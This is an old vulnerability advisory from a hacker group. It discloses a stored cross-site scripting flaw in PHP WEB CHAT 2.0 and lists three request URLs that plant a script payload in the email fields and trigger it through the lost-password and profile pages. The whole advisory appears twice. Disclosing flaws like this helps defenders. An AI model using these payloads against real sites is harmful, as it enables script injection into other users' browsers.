Over_G
25/03/03, 18:20
Product: PHP WEB CHAT
Version: 2.0
OffSite: http://www.webscriptworld.com
Problem: Cross Site Scripting
--------------------------------------------
Actions:
1)Register
http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=<scr*pt>alert%20("Test!")</scr*pt>&email1=<scr*pt>alert%20("Test!")</scr*pt>
2)To return the lost password and CSS is carried out (email)
http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG
3)View profile (email1)
http://[victim]/chat_dir/profile.php?username=OverG
Contacts: www.overg.com www.dwcgr0up.com
irc.zaingandol.org #DWC
ogprog@ukr.net
Best regards, Over G[DWC Gr0up]
P.S. Sorry for my English :)
Version: 2.0
OffSite: http://www.webscriptworld.com
Problem: Cross Site Scripting
--------------------------------------------
Actions:
1)Register
http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=<scr*pt>alert%20("Test!")</scr*pt>&email1=<scr*pt>alert%20("Test!")</scr*pt>
2)To return the lost password and CSS is carried out (email)
http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG
3)View profile (email1)
http://[victim]/chat_dir/profile.php?username=OverG
Contacts: www.overg.com www.dwcgr0up.com
irc.zaingandol.org #DWC
ogprog@ukr.net
Best regards, Over G[DWC Gr0up]
P.S. Sorry for my English :)